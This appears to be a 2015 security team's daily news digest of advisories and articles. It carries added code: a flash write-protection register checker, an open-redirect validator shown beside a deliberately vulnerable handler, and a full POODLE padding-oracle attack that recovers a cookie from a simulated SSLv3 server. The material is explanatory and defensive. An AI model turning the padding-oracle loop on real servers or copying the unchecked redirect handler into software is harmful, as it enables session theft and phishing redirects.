End-of-Shift report
Timeframe: Thursday 28-05-2015 18:00 − Friday 29-05-2015 18:00
Handler: Stephan Richter
Co-Handler: n/a
The Empire Strikes Back Apple - how your Mac firmware security is completely broken
[...] What is that hole after all? Is Dark Jedi hard to achieve on Macs? No, it's extremely easy because Apple does all the dirty work for you. What the hell am I talking about? Well, Apple's S3 suspend-resume implementation is so f*cked up that they will leave the flash protections unlocked after a suspend-resume cycle.
https://reverse.put.as/2015/05/29/the-empire-strikes-back-apple-how-your-mac-firmware-security-is-completely-broken/
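The post above says the flash write protections are left open after an S3 suspend-resume cycle. As an added check that is not code from the reverse.put.as post: the following decodes the two Intel PCH registers a tool such as chipsec's bios_wp module inspects to decide whether the BIOS region of SPI flash is writable. Register names and bit positions are from the Intel 8/9-series PCH datasheets; the register values in the block are constructed to show a locked machine and an unlocked state, not values read from a Mac, and reading the real registers requires root and a tool like chipsec.

```python
"""Decode the Intel PCH registers that gate writes to the BIOS region of SPI flash.

Added example, not code from the reverse.put.as post. Layouts follow the Intel
8/9-series PCH datasheets: BIOS_CNTL is at PCI config offset 0xDC of the LPC
bridge (D31:F0); HSFS is at SPIBAR + 0x04. The sample values at the bottom are
constructed, not read from a Mac. Reading the live registers needs root and a
tool such as chipsec (`chipsec_main -m common.bios_wp`).
"""
BIOSWE  = 1 << 0    # BIOS Write Enable: 1 = BIOS region writable
BLE     = 1 << 1    # BIOS Lock Enable: a write that sets BIOSWE raises an SMI
SMM_BWP = 1 << 5    # SMM BIOS Write Protect: writes allowed only from SMM
FLOCKDN = 1 << 15   # HSFS: locks the SPI protected-range registers (PRx)


def decode_bios_cntl(value: int) -> dict:
    """Split BIOS_CNTL into the three bits that matter for write protection."""
    return {"BIOSWE": bool(value & BIOSWE),
            "BLE": bool(value & BLE),
            "SMM_BWP": bool(value & SMM_BWP)}


def flash_write_protected(bios_cntl: int, hsfs: int) -> tuple[bool, list[str]]:
    """Return (protected, findings). Slightly stricter than chipsec's bios_wp rule:
    BIOSWE must be clear, BLE or SMM_BWP must be set so that ring-0 code cannot
    simply re-enable writes, and FLOCKDN must be set or the PRx ranges can be
    rewritten.
    """
    bits = decode_bios_cntl(bios_cntl)
    findings = []
    if bits["BIOSWE"]:
        findings.append("BIOSWE=1: BIOS region is writable right now")
    if not bits["SMM_BWP"] and not bits["BLE"]:
        findings.append("BLE=0, SMM_BWP=0: any ring-0 code can set BIOSWE")
    if not hsfs & FLOCKDN:
        findings.append("FLOCKDN=0: SPI protected ranges (PRx) are not locked")
    return (not findings, findings)


if __name__ == "__main__":
    # Constructed values: a locked cold-boot state, then an unlocked post-resume state.
    for label, cntl, hsfs in [("cold boot", 0x2A, 0xC000),
                              ("after S3 resume", 0x08, 0x4000)]:
        ok, why = flash_write_protected(cntl, hsfs)
        print(f"{label}: {'protected' if ok else 'UNPROTECTED'} {why}")
```

Run it once at cold boot and once after a suspend-resume cycle with values read by chipsec; a change from no findings to any finding is the condition the post describes.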
HITB Amsterdam Wrap-Up Day #1
The HITB crew is back in the beautiful city of Amsterdam for a new edition of their security conference. Here is my wrap-up for the first day! The opening keynote was assigned to Marcia Hofmann, who worked for the EFF (the Electronic Frontier Foundation). Her keynote title was: "Fighting for Internet Security in the New Crypto Wars". EFF always fights for more privacy, and she reviewed the history of encryption and...
http://blog.rootshell.be/2015/05/28/hitb-amsterdam-wrap-up-day-1-2/
Security vulnerabilities: errors in browser logic
Using relatively simple methods, 18-year-old web developer Bas Venis managed to uncover serious security vulnerabilities in the Chrome browser and in the Flash plugin. He is calling on others to look for bugs in the logic of browsers.
http://www.golem.de/news/sicherheitsluecken-fehler-in-der-browser-logik-1505-114343-rss.html
Tor: hidden services easier to deanonymize
The Tor protocol makes it relatively easy for attackers to gain control of the directory servers of so-called hidden services. As a result, deanonymizing traffic is considerably easier than for access to regular websites.
http://www.golem.de/news/tor-hidden-services-leichter-zu-deanonymisieren-1505-114347.html
Crypto flaws in Blockchain Android app sent Bitcoins to the wrong address
A comedy of programming errors could prove catastrophic for affected users.
http://feeds.arstechnica.com/~r/arstechnica/security/~3/9dMUjIT6yyo/
ZyXEL protects its routers against the NetUSB vulnerability
With security updates, network equipment maker ZyXEL closes the critical NetUSB vulnerability in all affected models.
http://heise.de/-2671364
Lessons learned from Flame, three years later
Three years ago, on May 28th 2012, we announced the discovery of a malware known as Flame. Since then, we have reported on many other advanced malware platforms. Looking back at the discovery of Flame, here are some lessons we learned.
http://securelist.com/blog/opinions/70149/lessons-learned-from-flame-three-years-later/
Phishing Gang is Audacious Manipulator
Cybercriminals who specialize in phishing -- or tricking people into giving up usernames and passwords at fake bank and ecommerce sites -- aren't generally considered the most sophisticated crooks, but occasionally they do exhibit creativity and chutzpah. That's most definitely the case with a phishing gang that calls itself the "Manipulaters Team", whose Web site boasts that it specializes in brand research and development.
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/qKqrwDK8oQ8/
A Drafty House: Analysis of the Current Use of AWS EC2 Security Groups
After a very confusing set of results from a survey we ran and exploring the new world of threat detection and incident response in AWS, we decided to go out and do a little research to see how the world was faring with the new security features in Amazon AWS. In short, we can safely say that a good chunk of EC2 users have left their front door open (actually with this analogy they also left their back door, side window, and garage open). Our analysis showed that users are: Using...
https://feeds.feedblitz.com/~/93538286/0/alienvault-blogs~A-Drafty-House-Analysis-of-the-Current-Use-of-AWS-EC-Security-Groups
Stegosploit hides malicious code in images, this is the future of online attacks
Stegosploit is the technique developed by the security researcher Saumil Shah that allows an attacker to embed executable JavaScript code within an image. The security researcher Saumil Shah from Net Square security has presented at Hack In The Box conference in Amsterdam his Stegosploit project which allows an attacker to embed executable JavaScript code within an...
http://securityaffairs.co/wordpress/37302/hacking/stegosploit-malware-images.html
Statistics on botnet-assisted DDoS attacks in Q1 2015
One popular DDoS scenario is a botnet-assisted attack. In Q1 2015, 23,095 botnet-assisted DDoS attacks were reported. These statistics refer to those botnets which were detected and analyzed by Kaspersky Lab.
http://securelist.com/blog/research/70071/statistics-on-botnet-assisted-ddos-attacks-in-q1-2015/
Linux Kernel __driver_rfc4106_decrypt() Buffer Overflow May Let Remote Users Execute Arbitrary Code
http://www.securitytracker.com/id/1032416
Pivotal Cloud Foundry directory traversal
http://xforce.iss.net/xforce/xfdb/103449
IBM Security Bulletins
https://www-304.ibm.com/connections/blogs/PSIRT/?lang=en_us
IBM Cognos Business Intelligence Developer 10.2.1 (backURL) Open Redirect
Input passed via the backURL GET parameter in /p2pd/servlet/dispatch is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5244.php
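The advisory above is the classic open-redirect pattern: a "return to" parameter copied into the Location header unchecked. As an added example, not IBM's code: the unchecked handler beside a validator that only follows targets staying on the application. The parameter name backURL is from the advisory; the host name cognos.example and the fallback path are assumptions, and the value is taken to be the already URL-decoded request parameter. The rejected cases go beyond the advisory's plain "arbitrary website" and cover the encodings browsers still resolve to a foreign host.

```python
"""Open-redirect check for a "return to" parameter such as backURL above.

Added example, not IBM's code. The parameter name backURL comes from the
advisory; the host name cognos.example and the default landing path are
assumptions. Input is the already URL-decoded parameter value.
"""
from urllib.parse import urlsplit

SELF_HOSTS = frozenset({"cognos.example"})   # assumed: hosts this application is served from


def vulnerable_redirect(back_url: str) -> str:
    """What the advisory describes: the parameter goes straight into Location."""
    return back_url or "/"


def safe_redirect_target(back_url: str, allowed_hosts=SELF_HOSTS, default: str = "/") -> str:
    """Return back_url only if it stays on this application; otherwise `default`."""
    # Empty, or control characters / whitespace (header injection, leading-space tricks).
    if not back_url or any(ord(c) < 0x21 for c in back_url):
        return default
    # Browsers treat backslashes as slashes, so "/\evil.example" is really "//evil.example".
    candidate = back_url.replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:                       # e.g. malformed IPv6 literal
        return default
    if parts.scheme:
        # Absolute URL: only http(s), only our own host, and no userinfo because
        # "https://cognos.example@evil.example/" goes to evil.example. An empty
        # netloc ("http:evil.example", "https:///evil.example") is rejected too,
        # since browsers still resolve those to a foreign host.
        if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
            return default
        if "@" in parts.netloc or parts.hostname is None:
            return default
        return candidate if parts.hostname.lower() in allowed_hosts else default
    # No scheme: accept only a path-absolute URL with a single leading slash.
    # "//host/" is scheme-relative and "///host/" is collapsed by browsers to the
    # same thing, so both are refused.
    if candidate.startswith("/") and not candidate.startswith("//"):
        return candidate
    return default
```

The safest variant of this check is stricter still: accept only a relative path, never an absolute URL, when the application has no legitimate reason to bounce users between hosts.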
DSA-3274 virtualbox - security update
Jason Geffner discovered a buffer overflow in the emulated floppy disk drive, resulting in potential privilege escalation.
https://www.debian.org/security/2015/dsa-3274
IDS RTU 850 Directory Traversal Vulnerability
This advisory provides mitigation details for a directory traversal vulnerability in IDS RTU 850C.
https://ics-cert.us-cert.gov/advisories/ICSA-15-148-01
Security Notice - Statement on Security Researchers Revealing Security Issues on Huawei Products in HITB SecConf
May 29, 2015 17:47
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/hw-436642.htm
Security Notice-Statement on the Wooyun-disclosed XSS Vulnerability in Huawei Smartphone Browser
May 29, 2015 17:43
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/hw-436633.htm
SSL-TLS Implementations Cipher Block Chaining Padding Information Disclosure Vulnerability
http://tools.cisco.com/security/center/viewAlert.x?alertId=36740
HPSBGN03332 rev.1 - HP Operations Analytics running SSLv3, Remote Denial of Service (DoS), Disclosure of Information
A potential security vulnerability has been identified in HP Operations Analytics running SSLv3. This is the SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" or "Poodle", which could be exploited remotely resulting in Denial of Service (DoS) or disclosure of information.
https://h20566.www2.hp.com/hpsc/doc/public/display?ac.admitted=1432904051426.876444892.199480143&docId=emr_na-c04676133
HPSBMU03267 rev.2 - HP Matrix Operating Environment and HP CloudSystem Matrix running OpenSSL, Remote Disclosure of Information
Potential security vulnerabilities have been identified with the HP Matrix Operating Environment and HP CloudSystem Matrix running OpenSSL. These vulnerabilities comprise the SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" or "POODLE", which could be exploited remotely to allow disclosure of information.
https://h20566.www2.hp.com/hpsc/doc/public/display?ac.admitted=1432904065175.876444892.199480143&docId=emr_na-c04576624
HPSBMU03263 rev.3 - HP Insight Control running OpenSSL, Remote Disclosure of Information
Potential security vulnerabilities have been identified with HP Insight Control running OpenSSL. These vulnerabilities include the SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" or "POODLE", which could be exploited remotely to allow disclosure of information.
https://h20566.www2.hp.com/hpsc/doc/public/display?ac.admitted=1432904087214.876444892.199480143&docId=emr_na-c04574073
HPSBMU03261 rev.2 - HP Systems Insight Manager running OpenSSL on Linux and Windows, Remote Disclosure of Information
Potential security vulnerabilities have been identified with HP Systems Insight Manager running OpenSSL on Linux and Windows. These vulnerabilities are related to the SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" or "POODLE", which could be exploited remotely to allow disclosure of information.
https://h20566.www2.hp.com/hpsc/doc/public/display?ac.admitted=1432904104641.876444892.199480143&docId=emr_na-c04571454
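The Cisco alert and the four HP bulletins above all describe the same SSLv3 weakness: CBC padding whose content is never checked, so a server that accepts or rejects a record leaks one bit per request. The following is an added example, not code from Cisco, HP or the POODLE paper: a simulation of the attack against an SSLv3-style record layer (MAC, then padding, then CBC). AES is replaced by a toy keyed Feistel permutation so the script needs only the Python standard library; the attack depends on CBC chaining and on the padding check, not on the cipher. Keys, the cookie value and the request layout (attacker-controlled prefix, secret cookie, attacker-controlled suffix, as driven by attacker JavaScript in the real attack) are constructed for the demo.

```python
"""POODLE-style padding oracle against a simulated SSLv3 record layer.

Added example, not code from Cisco, HP or the POODLE paper. The cipher is a toy
keyed Feistel permutation standing in for AES so that only the standard library
is needed; keys, cookie value and request layout are constructed for the demo.
"""
import hashlib
import hmac
import random

B = 16          # cipher block size
MAC_LEN = 20    # SSLv3 SHA-1 MAC length


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:B // 2]


def block_encrypt(key, blk):
    """Toy 4-round Feistel permutation on one 16-byte block (stand-in for AES)."""
    l, r = blk[:B // 2], blk[B // 2:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, rnd, r))
    return l + r


def block_decrypt(key, blk):
    l, r = blk[:B // 2], blk[B // 2:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, rnd, l)), l
    return l + r


class SSLv3Server:
    """MAC-then-pad-then-CBC as in SSLv3; on receive only the padding *length*
    byte is checked, never the padding bytes themselves. That is the oracle."""

    def __init__(self, seed=1):
        self.rng = random.Random(seed)      # deterministic IVs for the demo
        self.enc_key, self.mac_key = b"enc-key", b"mac-key"
        self.secret = b"S3cr3t"             # constructed session cookie

    def _rand(self, n):
        return bytes(self.rng.getrandbits(8) for _ in range(n))

    def send(self, prefix, suffix):
        """Encrypt one record for prefix || secret cookie || suffix under a fresh IV."""
        msg = prefix + self.secret + suffix
        mac = hmac.new(self.mac_key, msg, hashlib.sha1).digest()
        pad_len = B - 1 - (len(msg) + MAC_LEN) % B    # padding bytes before the length byte
        pt = msg + mac + self._rand(pad_len) + bytes([pad_len])
        prev = self._rand(B)                          # IV
        out = [prev]
        for i in range(0, len(pt), B):
            prev = block_encrypt(self.enc_key, _xor(pt[i:i + B], prev))
            out.append(prev)
        return b"".join(out)

    def receive(self, record):
        """True if the record is accepted: padding length plausible and MAC correct."""
        blocks = [record[i:i + B] for i in range(0, len(record), B)]
        pt = b"".join(_xor(block_decrypt(self.enc_key, blocks[i]), blocks[i - 1])
                      for i in range(1, len(blocks)))
        pad_len = pt[-1]
        if pad_len >= B:                              # the only padding check SSLv3 makes
            return False
        body = pt[:-(pad_len + 1)]
        expect = hmac.new(self.mac_key, body[:-MAC_LEN], hashlib.sha1).digest()
        return hmac.compare_digest(body[-MAC_LEN:], expect)


def poodle(server, secret_len, max_tries=1 << 16):
    """Recover the cookie one byte at a time, about 256 requests per byte."""
    recovered = bytearray()
    for j in range(secret_len):
        # Put cookie byte j in the last position of a plaintext block, and pick the
        # suffix length so the record ends with a full block of padding (length byte 15).
        prefix = b"A" * ((B - 1 - j) % B)
        suffix = b"B" * (-(len(prefix) + secret_len + MAC_LEN) % B)
        t = (len(prefix) + j) // B + 1      # ciphertext block holding byte j (block 0 is the IV)
        for _ in range(max_tries):
            rec = server.send(prefix, suffix)
            blocks = [rec[i:i + B] for i in range(0, len(rec), B)]
            n = len(blocks) - 1             # index of the padding block
            # Replace the padding block by the target block. The server then sees
            # D(C_t) xor C_{n-1} = P_t xor C_{t-1} xor C_{n-1} as its last block and
            # accepts exactly when that block's last byte is 15.
            if server.receive(b"".join(blocks[:n] + [blocks[t]])):
                recovered.append((B - 1) ^ blocks[t - 1][-1] ^ blocks[n - 1][-1])
                break
        else:
            raise RuntimeError("oracle never accepted; check alignment")
    return bytes(recovered)


if __name__ == "__main__":
    srv = SSLv3Server()
    print(poodle(srv, len(srv.secret)))     # b'S3cr3t'
```

The fix the bulletins point at is to stop negotiating SSLv3 at all (and TLS_FALLBACK_SCSV so a client cannot be downgraded to it); TLS 1.0 and later verify every padding byte, which removes the 1-in-256 acceptance the loop above relies on.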